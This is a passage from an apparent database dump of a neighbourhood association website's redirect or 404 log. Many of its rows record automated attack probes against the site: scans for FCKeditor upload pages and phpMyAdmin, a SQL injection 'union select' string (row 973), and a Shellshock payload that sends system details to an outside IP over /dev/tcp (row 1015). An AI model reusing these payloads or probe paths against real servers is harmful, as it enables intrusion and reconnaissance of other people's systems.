00:00:00'),(922,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/association/newsletters.html','','','',1,0,'2015-01-29 15:20:49','0000-00-00 00:00:00'),(923,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/interests.html','','','',1,0,'2015-01-29 15:20:49','0000-00-00 00:00:00'),(924,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/site-map.html','','','',1,0,'2015-01-29 15:20:52','0000-00-00 00:00:00'),(925,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/terms-of-service.html','','','',1,0,'2015-01-29 15:20:52','0000-00-00 00:00:00'),(926,'http://hallcrestheights.org/interests.html/interests/15-the-hallcrest-annual-meeting.html/privacy-policy.html','','','',1,0,'2015-01-29 15:20:52','0000-00-00 00:00:00'),(927,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:20:55','0000-00-00 00:00:00'),(928,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/community/announcements.html','','','',1,0,'2015-01-29 15:20:55','0000-00-00 00:00:00'),(929,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/community/events.html','','','',1,0,'2015-01-29 15:20:55','0000-00-00 00:00:00'),(930,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:20:55','0000-00-00 00:00:00'),(931,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/association/about-us.html','','','',1,0,'2015-01-29 15:20:56','0000-00-00 00:00:00'),(932,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/association/board-members.html','','','',1,0,'2015-01-29 15:20:56','0000-00-00 00:00:00'),(933,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/association/newsletters.html','','','',1,0,'2015-01-29 15:20:56','0000-00-00 00:00:00'),(934,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/interests.html','','','',1,0,'2015-01-29 15:20:56','0000-00-00 00:00:00'),(935,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/site-map.html','','','',1,0,'2015-01-29 15:21:00','0000-00-00 00:00:00'),(936,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/terms-of-service.html','','','',1,0,'2015-01-29 15:21:00','0000-00-00 00:00:00'),(937,'http://hallcrestheights.org/interests.html/interests/12-go-green.html/privacy-policy.html','','','',1,0,'2015-01-29 15:21:00','0000-00-00 00:00:00'),(938,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/community/neighborhood-guide.html','','','',1,0,'2015-01-29 15:21:03','0000-00-00 00:00:00'),(939,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/community/announcements.html','','','',1,0,'2015-01-29 15:21:03','0000-00-00 00:00:00'),(940,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/community/events.html','','','',1,0,'2015-01-29 15:21:03','0000-00-00 00:00:00'),(941,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/community/real-estate-guide.html','','','',1,0,'2015-01-29 15:21:03','0000-00-00 00:00:00'),(942,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/association/about-us.html','','','',1,0,'2015-01-29 15:21:04','0000-00-00 00:00:00'),(943,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/association/board-members.html','','','',1,0,'2015-01-29 15:21:04','0000-00-00 00:00:00'),(944,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/association/newsletters.html','','','',1,0,'2015-01-29 15:21:04','0000-00-00 00:00:00'),(945,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/interests.html','','','',1,0,'2015-01-29 15:21:04','0000-00-00 00:00:00'),(946,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/site-map.html','','','',1,0,'2015-01-29 15:21:10','0000-00-00 00:00:00'),(947,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/terms-of-service.html','','','',1,0,'2015-01-29 15:21:10','0000-00-00 00:00:00'),(948,'http://hallcrestheights.org/interests.html/interests/11-energy-tips.html/privacy-policy.html','','','',1,0,'2015-01-29 15:21:11','0000-00-00 00:00:00'),(949,'http://www.hallcrestheights.org/fckeditor/editor','','','',1,0,'2015-02-03 07:16:56','0000-00-00 00:00:00'),(950,'http://www.hallcrestheights.org/admin/fckeditor/editor','','','',1,0,'2015-02-03 07:16:57','0000-00-00 00:00:00'),(951,'http://www.hallcrestheights.org/sysadmin/fckeditor/editor','','','',1,0,'2015-02-03 08:28:05','0000-00-00 00:00:00'),(952,'http://www.hallcrestheights.org/scripts/fckeditor/editor','','','',1,0,'2015-02-03 08:28:05','0000-00-00 00:00:00'),(953,'http://www.hallcrestheights.org/editor1/editor','','','',1,0,'2015-02-03 08:28:05','0000-00-00 00:00:00'),(954,'http://www.hallcrestheights.org/manage/fckeditor/editor','','','',1,0,'2015-02-03 08:28:05','0000-00-00 00:00:00'),(955,'http://www.hallcrestheights.org/editor/fckeditor/editor','','','',1,0,'2015-02-03 08:28:05','0000-00-00 00:00:00'),(956,'http://www.hallcrestheights.org/inc/fckeditor/editor','','','',1,0,'2015-02-03 08:28:05','0000-00-00 00:00:00'),(957,'http://www.hallcrestheights.org/editor/editor','','','',1,0,'2015-02-03 08:28:06','0000-00-00 00:00:00'),(958,'http://www.hallcrestheights.org/system/fckeditor/editor','','','',1,0,'2015-02-03 08:28:06','0000-00-00 00:00:00'),(959,'http://www.hallcrestheights.org/js/fckeditor/editor','','','',1,0,'2015-02-03 08:28:06','0000-00-00 00:00:00'),(960,'http://www.hallcrestheights.org/Fckeditornew/editor','','','',1,0,'2015-02-03 08:28:06','0000-00-00 00:00:00'),(961,'http://www.hallcrestheights.org/include/fckeditor/editor','','','',1,0,'2015-02-03 08:28:06','0000-00-00 00:00:00'),(962,'http://www.hallcrestheights.org/includes/fckeditor/editor','','','',1,0,'2015-02-03 08:28:07','0000-00-00 00:00:00'),(963,'http://www.hallcrestheights.org/editorold/editor','','','',1,0,'2015-02-03 08:28:07','0000-00-00 00:00:00'),(964,'http://www.hallcrestheights.org/ckeditor/editor','','','',1,0,'2015-02-03 08:28:07','0000-00-00 00:00:00'),(965,'http://www.hallcrestheights.org/common/fckeditor/edito','','','',1,0,'2015-02-03 08:28:07','0000-00-00 00:00:00'),(966,'http://www.hallcrestheights.org/Fckeditorold/editor','','','',1,0,'2015-02-03 08:28:07','0000-00-00 00:00:00'),(967,'http://www.hallcrestheights.org//fckeditor/editor/dialog/fck_about.html','','','',1,0,'2015-02-03 14:43:29','0000-00-00 00:00:00'),(968,'http://www.hallcrestheights.org//js/fckeditor/editor/dialog/fck_about.html','','','',1,0,'2015-02-03 14:43:33','0000-00-00 00:00:00'),(969,'http://www.hallcrestheights.org//admin/fckeditor/editor/dialog/fck_about.html','','','',1,0,'2015-02-03 14:43:36','0000-00-00 00:00:00'),(970,'http://www.hallcrestheights.org//manage/fckeditor/editor/dialog/fck_about.html','','','',1,0,'2015-02-03 14:43:39','0000-00-00 00:00:00'),(971,'http://www.hallcrestheights.org//editor/editor/dialog/fck_about.html','','','',1,0,'2015-02-03 14:43:42','0000-00-00 00:00:00'),(972,'http://hallcrestheights.org/gsa-online.de/events.html','','http://hallcrestheights.org/','',1,0,'2015-02-13 03:53:56','0000-00-00 00:00:00'),(973,'http://hallcrestheights.org/index.php/weblinks-categories?id=0%20%29%20union%20select%20concat_ws%280x3A,12,56%29%20--%20%29','','','',1,0,'2015-02-17 21:59:09','0000-00-00 00:00:00'),(974,'http://hallcrestheights.org/js/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:47','0000-00-00 00:00:00'),(975,'http://hallcrestheights.org/lib/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:48','0000-00-00 00:00:00'),(976,'http://hallcrestheights.org/include/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:48','0000-00-00 00:00:00'),(977,'http://hallcrestheights.org/sites/all/modules/fckeditor/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:48','0000-00-00 00:00:00'),(978,'http://hallcrestheights.org/admin/editor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:49','0000-00-00 00:00:00'),(979,'http://hallcrestheights.org/admin/fck/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:49','0000-00-00 00:00:00'),(980,'http://hallcrestheights.org/modules/fckeditor/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:49','0000-00-00 00:00:00'),(981,'http://hallcrestheights.org/editor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:49','0000-00-00 00:00:00'),(982,'http://hallcrestheights.org/public/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:50','0000-00-00 00:00:00'),(983,'http://hallcrestheights.org/app/webroot/js/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:50','0000-00-00 00:00:00'),(984,'http://hallcrestheights.org/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:50','0000-00-00 00:00:00'),(985,'http://hallcrestheights.org/cms/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:51','0000-00-00 00:00:00'),(986,'http://hallcrestheights.org/admin/js/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:51','0000-00-00 00:00:00'),(987,'http://hallcrestheights.org/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:51','0000-00-00 00:00:00'),(988,'http://hallcrestheights.org/manage/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:52','0000-00-00 00:00:00'),(989,'http://hallcrestheights.org/system/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:52','0000-00-00 00:00:00'),(990,'http://hallcrestheights.org/plugins/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:52','0000-00-00 00:00:00'),(991,'http://hallcrestheights.org/webadmin/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:52','0000-00-00 00:00:00'),(992,'http://hallcrestheights.org/manager/fckeditor/editor/filemanager/connectors/uploadtest.html','','','',1,0,'2015-02-20 10:42:53','0000-00-00 00:00:00'),(993,'http://HALLCRESTHEIGHTS.ORG/admin/mysql/','','','',1,0,'2015-02-21 09:24:24','0000-00-00 00:00:00'),(994,'http://HALLCRESTHEIGHTS.ORG/admin/phpmyadmin/','','','',1,0,'2015-02-21 09:24:24','0000-00-00 00:00:00'),(995,'http://HALLCRESTHEIGHTS.ORG/admin/pma/','','','',1,0,'2015-02-21 09:24:25','0000-00-00 00:00:00'),(996,'http://HALLCRESTHEIGHTS.ORG/db/','','','',1,0,'2015-02-21 09:24:26','0000-00-00 00:00:00'),(997,'http://HALLCRESTHEIGHTS.ORG/pma/','','','',1,0,'2015-02-21 09:24:26','0000-00-00 00:00:00'),(998,'http://HALLCRESTHEIGHTS.ORG/dbadmin/','','','',1,0,'2015-02-21 09:24:27','0000-00-00 00:00:00'),(999,'http://HALLCRESTHEIGHTS.ORG/myadmin/','','','',1,0,'2015-02-21 09:24:27','0000-00-00 00:00:00'),(1000,'http://HALLCRESTHEIGHTS.ORG/mysql/','','','',1,0,'2015-02-21 09:24:28','0000-00-00 00:00:00'),(1001,'http://HALLCRESTHEIGHTS.ORG/mysqladmin/','','','',1,0,'2015-02-21 09:24:29','0000-00-00 00:00:00'),(1002,'http://HALLCRESTHEIGHTS.ORG/mysql-admin/','','','',1,0,'2015-02-21 09:24:29','0000-00-00 00:00:00'),(1003,'http://HALLCRESTHEIGHTS.ORG/phpm/','','','',1,0,'2015-02-21 09:24:30','0000-00-00 00:00:00'),(1004,'http://HALLCRESTHEIGHTS.ORG/phpmy/','','','',1,0,'2015-02-21 09:24:30','0000-00-00 00:00:00'),(1005,'http://HALLCRESTHEIGHTS.ORG/phpMyA/','','','',1,0,'2015-02-21 09:24:31','0000-00-00 00:00:00'),(1006,'http://HALLCRESTHEIGHTS.ORG/phpmyad/','','','',1,0,'2015-02-21 09:24:32','0000-00-00 00:00:00'),(1007,'http://HALLCRESTHEIGHTS.ORG/phpMyAdmi/','','','',1,0,'2015-02-21 09:24:32','0000-00-00 00:00:00'),(1008,'http://HALLCRESTHEIGHTS.ORG/phpmyadmin/','','','',1,0,'2015-02-21 09:24:33','0000-00-00 00:00:00'),(1009,'http://HALLCRESTHEIGHTS.ORG/phpMyAds/','','','',1,0,'2015-02-21 09:24:34','0000-00-00 00:00:00'),(1010,'http://HALLCRESTHEIGHTS.ORG/phpmyad-sys/','','','',1,0,'2015-02-21 09:24:35','0000-00-00 00:00:00'),(1011,'http://HALLCRESTHEIGHTS.ORG/web/phpMyAdmin/','','','',1,0,'2015-02-21 09:24:35','0000-00-00 00:00:00'),(1012,'http://HALLCRESTHEIGHTS.ORG/installer/','','','',1,0,'2015-02-21 09:24:36','0000-00-00 00:00:00'),(1013,'http://www.hallcrestheights.org/user','','','',1,0,'2015-03-01 15:45:03','0000-00-00 00:00:00'),(1014,'http://www.hallcrestheights.org/news.html','','','',1,0,'2015-03-05 07:24:25','0000-00-00 00:00:00'),(1015,'http://HALLCRESTHEIGHTS.ORG/cgi-sys/php5','','() { :;}; /bin/bash -c \"echo HALLCRESTHEIGHTS.ORG/cgi-sys/php5 > /dev/tcp/62.193.192.103//23; /bin/uname -a > /dev/tcp/62.193.192.103//23; echo HALLC','',1,0,'2015-03-08 14:23:42','0000-00-00 00:00:00'),(1016,'http://www.hallcrestheights.org/_engine/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:28','0000-00-00 00:00:00'),(1017,'http://www.hallcrestheights.org/include/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:29','0000-00-00 00:00:00'),(1018,'http://www.hallcrestheights.org/HTMLEditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:30','0000-00-00 00:00:00'),(1019,'http://www.hallcrestheights.org/Backend/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:30','0000-00-00 00:00:00'),(1020,'http://www.hallcrestheights.org/admin/classes/components/formattedTextArea/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:31','0000-00-00 00:00:00'),(1021,'http://www.hallcrestheights.org/news_script/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:32','0000-00-00 00:00:00'),(1022,'http://www.hallcrestheights.org/admin/view/javascript/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:32','0000-00-00 00:00:00'),(1023,'http://www.hallcrestheights.org/wp-content/plugins/chenpress/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:33','0000-00-00 00:00:00'),(1024,'http://www.hallcrestheights.org/wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:33','0000-00-00 00:00:00'),(1025,'http://www.hallcrestheights.org/community/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:34','0000-00-00 00:00:00'),(1026,'http://www.hallcrestheights.org/scripts/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:34','0000-00-00 00:00:00'),(1027,'http://www.hallcrestheights.org/assets/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:35','0000-00-00 00:00:00'),(1028,'http://www.hallcrestheights.org/main/inc/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:35','0000-00-00 00:00:00'),(1029,'http://www.hallcrestheights.org/php/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:36','0000-00-00 00:00:00'),(1030,'http://www.hallcrestheights.org/register/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:36','0000-00-00 00:00:00'),(1031,'http://www.hallcrestheights.org/admin/includes/rte/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:37','0000-00-00 00:00:00'),(1032,'http://www.hallcrestheights.org/CFIDE/scripts/ajax/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:37','0000-00-00 00:00:00'),(1033,'http://www.hallcrestheights.org/fckeditor/jscripts/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:38','0000-00-00 00:00:00'),(1034,'http://www.hallcrestheights.org/inurl-/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:39','0000-00-00 00:00:00'),(1035,'http://www.hallcrestheights.org/pub/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:39','0000-00-00 00:00:00'),(1036,'http://www.hallcrestheights.org/Manage/Include/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:40','0000-00-00 00:00:00'),(1037,'http://www.hallcrestheights.org/public/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:40','0000-00-00 00:00:00'),(1038,'http://www.hallcrestheights.org/asetrack/includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:41','0000-00-00 00:00:00'),(1039,'http://www.hallcrestheights.org/js/krte/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:41','0000-00-00 00:00:00'),(1040,'http://www.hallcrestheights.org/wp-content/plugins/wp-insert/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:44','0000-00-00 00:00:00'),(1041,'http://www.hallcrestheights.org/fckphp/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:44','0000-00-00 00:00:00'),(1042,'http://www.hallcrestheights.org/site/modules/fckeditor/fckeditor.html','','','',1,0,'2015-03-09 06:45:45','0000-00-00 00:00:00'),(1043,'http://www.hallcrestheights.org/AWT/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:45','0000-00-00 00:00:00'),(1044,'http://www.hallcrestheights.org/admin/produtos/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:46','0000-00-00 00:00:00'),(1045,'http://www.hallcrestheights.org/fronteiranorte/editor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:47','0000-00-00 00:00:00'),(1046,'http://www.hallcrestheights.org/app/webroot/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:47','0000-00-00 00:00:00'),(1047,'http://www.hallcrestheights.org/cart/admin/htmleditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:48','0000-00-00 00:00:00'),(1048,'http://www.hallcrestheights.org/paginas/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:48','0000-00-00 00:00:00'),(1049,'http://www.hallcrestheights.org/util/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:49','0000-00-00 00:00:00'),(1050,'http://www.hallcrestheights.org/extensions/FCKeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:49','0000-00-00 00:00:00'),(1051,'http://www.hallcrestheights.org/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:49','0000-00-00 00:00:00'),(1052,'http://www.hallcrestheights.org/blog/admin/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:50','0000-00-00 00:00:00'),(1053,'http://www.hallcrestheights.org/classifieds/submit/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:51','0000-00-00 00:00:00'),(1054,'http://www.hallcrestheights.org/data/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:52','0000-00-00 00:00:00'),(1055,'http://www.hallcrestheights.org/adminweb/util/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:52','0000-00-00 00:00:00'),(1056,'http://www.hallcrestheights.org/jsincludes/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:53','0000-00-00 00:00:00'),(1057,'http://www.hallcrestheights.org/modules/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:54','0000-00-00 00:00:00'),(1058,'http://www.hallcrestheights.org/resources/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:54','0000-00-00 00:00:00'),(1059,'http://www.hallcrestheights.org/common/htmlarea/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:55','0000-00-00 00:00:00'),(1060,'http://www.hallcrestheights.org/library/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:56','0000-00-00 00:00:00'),(1061,'http://www.hallcrestheights.org/multicms/packages/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:45:56','0000-00-00 00:00:00'),(1062,'http://www.hallcrestheights.org/plugins/HTMLeditor/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:00','0000-00-00 00:00:00'),(1063,'http://www.hallcrestheights.org/html/proudphufah/admin/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:08','0000-00-00 00:00:00'),(1064,'http://www.hallcrestheights.org/js/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:09','0000-00-00 00:00:00'),(1065,'http://www.hallcrestheights.org/javascripts/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:09','0000-00-00 00:00:00'),(1066,'http://www.hallcrestheights.org/joomla/Medkorp/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:10','0000-00-00 00:00:00'),(1067,'http://www.hallcrestheights.org/assets/includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:10','0000-00-00 00:00:00'),(1068,'http://www.hallcrestheights.org/v1/plugins/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:11','0000-00-00 00:00:00'),(1069,'http://www.hallcrestheights.org/core/php/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:11','0000-00-00 00:00:00'),(1070,'http://www.hallcrestheights.org/db/include/class/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:14','0000-00-00 00:00:00'),(1071,'http://www.hallcrestheights.org/dhtml_editor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:16','0000-00-00 00:00:00'),(1072,'http://www.hallcrestheights.org/blogscript/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:17','0000-00-00 00:00:00'),(1073,'http://www.hallcrestheights.org/gallery/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:18','0000-00-00 00:00:00'),(1074,'http://www.hallcrestheights.org/control/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:19','0000-00-00 00:00:00'),(1075,'http://www.hallcrestheights.org/gateweb/scripts/fckeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:19','0000-00-00 00:00:00'),(1076,'http://www.hallcrestheights.org/static/scripts/ajax/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-03-09 06:46:20','0000-00-00 00:00:00'),(1077,'http://hallcrestheights.org/admin/fckeditor/editor/','','','',1,0,'2015-03-14 22:14:26','0000-00-00 00:00:00'),(1078,'http://hallcrestheights.org/FCKeditor/editor/','','','',1,0,'2015-03-14 22:14:27','0000-00-00 00:00:00'),(1079,'http://hallcrestheights.org/system/fckeditor/editor/','','','',1,0,'2015-03-14 22:14:27','0000-00-00 00:00:00'),(1080,'http://hallcrestheights.org/Fckeditorold/editor/','','','',1,0,'2015-03-14 22:14:27','0000-00-00 00:00:00'),(1081,'http://hallcrestheights.org/manage/fckeditor/editor/','','','',1,0,'2015-03-14 22:14:27','0000-00-00 00:00:00'),(1082,'http://hallcrestheights.org/inc/fckeditor/editor/','','','',1,0,'2015-03-14 22:14:28','0000-00-00 00:00:00'),(1083,'http://hallcrestheights.org/scripts/fckeditor/editor/','','','',1,0,'2015-03-24 19:40:08','0000-00-00 00:00:00'),(1084,'http://hallcrestheights.org/Fckeditornew/editor/','','','',1,0,'2015-03-24 19:40:08','0000-00-00 00:00:00'),(1085,'http://hallcrestheights.org/includes/fckeditor/editor/','','','',1,0,'2015-03-24 19:40:08','0000-00-00 00:00:00'),(1086,'http://hallcrestheights.org/fck/editor/','','','',1,0,'2015-03-24 19:40:08','0000-00-00 00:00:00'),(1087,'http://hallcrestheights.org/editor/editor/','','','',1,0,'2015-03-24 19:40:09','0000-00-00 00:00:00'),(1088,'http://hallcrestheights.org/sysadmin/fckeditor/editor/','','','',1,0,'2015-03-24 19:40:09','0000-00-00 00:00:00'),(1089,'http://hallcrestheights.org/include/fckeditor/editor/','','','',1,0,'2015-03-24 19:40:09','0000-00-00 00:00:00'),(1090,'http://hallcrestheights.org/editorold/editor/','','','',1,0,'2015-03-24 19:40:10','0000-00-00 00:00:00'),(1091,'http://hallcrestheights.org/js/fckeditor/editor/','','','',4,0,'2015-03-24 19:40:10','0000-00-00 00:00:00'),(1092,'http://hallcrestheights.org/ckeditor/editor/','','','',1,0,'2015-03-24 19:40:11','0000-00-00 00:00:00'),(1093,'http://hallcrestheights.org/editor/fckeditor/editor/','','','',1,0,'2015-03-24 19:40:11','0000-00-00 00:00:00'),(1094,'http://hallcrestheights.org/editor1/editor/','','','',1,0,'2015-03-24 19:40:12','0000-00-00 00:00:00'),(1095,'http://hallcrestheights.org/common/fckeditor/editor/','','','',1,0,'2015-03-24 19:40:12','0000-00-00 00:00:00'),(1096,'http://hallcrestheights.org/admin/edit/','','','',1,0,'2015-03-26 01:45:06','0000-00-00 00:00:00'),(1097,'http://hallcrestheights.org/admin/web_editor/','','','',1,0,'2015-03-26 01:45:06','0000-00-00 00:00:00'),(1098,'http://hallcrestheights.org/system/htmledit/','','','',1,0,'2015-03-26 01:45:06','0000-00-00 00:00:00'),(1099,'http://hallcrestheights.org/system/editor/','','','',1,0,'2015-03-26 01:45:06','0000-00-00 00:00:00'),(1100,'http://hallcrestheights.org/system/texteditor/','','','',1,0,'2015-03-26 01:45:06','0000-00-00 00:00:00'),(1101,'http://hallcrestheights.org/edit/','','','',1,0,'2015-03-26 01:45:07','0000-00-00 00:00:00'),(1102,'http://hallcrestheights.org/manage/web_editor/','','','',1,0,'2015-03-26 01:45:07','0000-00-00 00:00:00'),(1103,'http://hallcrestheights.org/admin/southidceditor/','','','',1,0,'2015-03-26 01:45:07','0000-00-00 00:00:00'),(1104,'http://hallcrestheights.org/manage/ewebeditor1/','','','',1,0,'2015-03-26 01:45:07','0000-00-00 00:00:00'),(1105,'http://hallcrestheights.org/system/southidceditor/','','','',1,0,'2015-03-26 01:45:07','0000-00-00 00:00:00'),(1106,'http://hallcrestheights.org/manage/webedit/','','','',1,0,'2015-03-26 01:45:08','0000-00-00 00:00:00'),(1107,'http://hallcrestheights.org/system/ewebeditor1/','','','',1,0,'2015-03-26 01:45:08','0000-00-00 00:00:00'),(1108,'http://hallcrestheights.org/adminpage/edit/','','','',1,0,'2015-03-26 01:45:08','0000-00-00 00:00:00'),(1109,'http://hallcrestheights.org/admin/editor/','','','',1,0,'2015-03-26 01:45:08','0000-00-00 00:00:00'),(1110,'http://hallcrestheights.org/system/webedit/','','','',1,0,'2015-03-26 01:45:08','0000-00-00 00:00:00'),(1111,'http://hallcrestheights.org/manage/edit/','','','',1,0,'2015-03-26 01:45:09','0000-00-00 00:00:00'),(1112,'http://hallcrestheights.org/admin/z_editor/','','','',1,0,'2015-03-26 01:45:09','0000-00-00 00:00:00'),(1113,'http://hallcrestheights.org/manage/texteditor/','','','',1,0,'2015-03-26 01:45:09','0000-00-00 00:00:00'),(1114,'http://hallcrestheights.org/admin/oledit/','','','',1,0,'2015-03-26 01:45:09','0000-00-00 00:00:00'),(1115,'http://hallcrestheights.org/system/edit/','','','',1,0,'2015-03-26 01:45:09','0000-00-00 00:00:00'),(1116,'http://hallcrestheights.org/admin/%23ewebeditor/','','','',1,0,'2015-03-26 01:45:10','0000-00-00 00:00:00'),(1117,'http://hallcrestheights.org/admin/texteditor/','','','',1,0,'2015-03-26 01:45:10','0000-00-00 00:00:00'),(1118,'http://hallcrestheights.org/inc/ewebeditor/','','','',1,0,'2015-03-26 01:45:10','0000-00-00 00:00:00'),(1119,'http://hallcrestheights.org/manage/ewebeditor/','','','',1,0,'2015-03-26 01:45:10','0000-00-00 00:00:00'),(1120,'http://hallcrestheights.org/system/ewebeditor/','','','',1,0,'2015-03-26 01:45:10','0000-00-00 00:00:00'),(1121,'http://hallcrestheights.org/texteditor/','','','',1,0,'2015-03-26 01:45:11','0000-00-00 00:00:00'),(1122,'http://hallcrestheights.org/admin/htmledit/','','','',1,0,'2015-03-26 01:45:11','0000-00-00 00:00:00'),(1123,'http://hallcrestheights.org/system/oledit/','','','',1,0,'2015-03-26 01:45:11','0000-00-00 00:00:00'),(1124,'http://hallcrestheights.org/manage/southidceditor/','','','',1,0,'2015-03-26 01:45:11','0000-00-00 00:00:00'),(1125,'http://hallcrestheights.org/html/webedit/','','','',1,0,'2015-03-26 01:45:11','0000-00-00 00:00:00'),(1126,'http://hallcrestheights.org/web_editor/','','','',1,0,'2015-03-26 01:45:12','0000-00-00 00:00:00'),(1127,'http://hallcrestheights.org/admin/webeditor','','','',1,0,'2015-03-26 01:45:12','0000-00-00 00:00:00'),(1128,'http://hallcrestheights.org/manage/htmledit/','','','',1,0,'2015-03-26 01:45:12','0000-00-00 00:00:00'),(1129,'http://hallcrestheights.org/admin/ewebeditor/','','','',1,0,'2015-03-26 01:45:12','0000-00-00 